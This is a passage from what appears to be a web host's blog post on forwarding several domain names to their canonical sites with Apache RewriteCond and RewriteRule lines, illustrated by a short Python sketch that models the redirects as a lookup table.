You can add more sites (to and from) by repeating the RewriteCond and RewriteRule lines. The only real difference between this and the previous example is that we ditched the ! in the RewriteCond lines, meaning that instead of applying to names that don’t match, we apply to names that do.
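Seen as data, the multi-destination setup is just a lookup table from alternate name to canonical name. The sketch below models it that way; the table and function name are invented for this example, and it is an emulation of the rules above rather than anything Apache runs.

```python
# Alternate name -> canonical name, mirroring the RewriteCond/RewriteRule pairs.
FORWARDS = {
    "example.com": "www.example.com",
    "other.com": "www.other.com",
}


def forward(host, request_uri, forwards=FORWARDS):
    """Return (301, location) if host has a forwarding entry, else None."""
    # Lowercasing the host plays the role of the [NC] flag.
    canonical = forwards.get(host.lower())
    if canonical is None:
        return None
    return (301, "http://" + canonical + request_uri)


if __name__ == "__main__":
    print(forward("example.com", "/"))
    print(forward("Other.com", "/about.html"))
    print(forward("unlisted.example.org", "/"))
```

Adding another pair of sites is one more entry in the table, just as it is one more RewriteCond and RewriteRule pair in the .htaccess file.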

So that’s three different approaches to the same problem. All work, but they are useful in different circumstances. We can’t document everything in our FAQ, but I’m hoping that one of the uses of our new blog will be the opportunity to explore alternatives like this that might be helpful to our members.
